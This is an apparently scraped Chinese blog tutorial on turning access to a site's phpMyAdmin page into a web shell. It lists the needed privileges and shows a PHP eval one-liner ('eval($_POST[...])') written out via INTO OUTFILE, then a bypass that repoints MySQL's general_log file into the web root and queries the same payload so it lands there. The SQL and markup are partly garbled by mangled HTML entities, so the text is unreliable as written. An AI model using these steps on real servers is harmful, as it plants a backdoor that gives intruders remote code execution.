这篇文章主要介绍了phpmyadmin中getshell有什么用,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获、下面让小编带着大家一起了解一下。
<强> phpmyadmin
通俗的讲其作用就是可以在web页面方便的操作数据库。
当我们得到一个站点的phpmyadmin页面时,下一步要做的就是getshell。
可以通过写壳进行提权,而我们需要满足以下条件:
1。数据库根权限
2。知道网站的物理路径
3。数据库有写权限
通过,选择& # 39;& lt; ?php eval ($ _POST=[123];) ?祝辞& # 39;到输出文件& # 39;网站物理路径& # 39;写入壳
本文主要讲的是在条件3不满足的情况下成功getshell。
利用条件:<强> MySQL 5.0 +
<强> MySQL 5.0 + 的版本会自动创建日志文件,那么在服务运行的情况下修改全局变量也是可以变动文件位置的,但是必须要对生成日志的目录有可读可写的权限。
<强> (Linux环境下可能会比较苛刻,因为站点目录是一个用户,MySQL是另外一个用户,权限管控较为严格,主要取决于权限配置是否得当)
首先我们测试站点是否有写权限
执行sql语句,,,,,,,显示变量如& # 39;secure_file_priv& # 39;
<李>
当secure_file_priv的值为null,表示限制mysql不允许导入|导出
<李>当secure_file_priv的值为/tmp/,表示限制mysql的导入|导出只能发生在/tmp/目录下
<李>当secure_file_priv的值没有具体值时,表示不对mysql的导入|导出做限制
可以在mysql-ini文件中设置其属性
<李>
<强>通用日志指的是日志保存状态,一共有两个值(开/关)代表开启了代表关闭。
<李><强>通用日志文件指的是日志的保存路径。
我们可以通过将一句话木马写入mysql日志中然后移动mysql日志路径到网站目录下实现getshell
执行sql语句,显示变量如& # 39;general_log % & # 39;,进行模糊查询
select , & # 39; & lt; ? php eval ($ _POST [aaa]); ?祝辞& # 39;
感谢你能够认真阅读完这篇文章,希望小编分享的“phpmyadmin中getshell有什么用”这篇文章对大家有帮助,同时也希望大家多多支持,关注行业资讯频道,更多相关知识等着你来学习!
